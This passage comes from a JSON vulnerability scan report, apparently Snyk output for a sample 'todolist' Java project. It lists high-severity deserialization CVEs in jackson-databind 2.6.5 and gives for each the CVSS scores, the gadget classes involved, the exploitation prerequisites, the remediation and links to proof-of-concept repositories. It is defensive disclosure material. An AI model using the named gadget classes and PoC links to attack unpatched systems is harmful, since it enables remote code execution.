"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + 
"assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
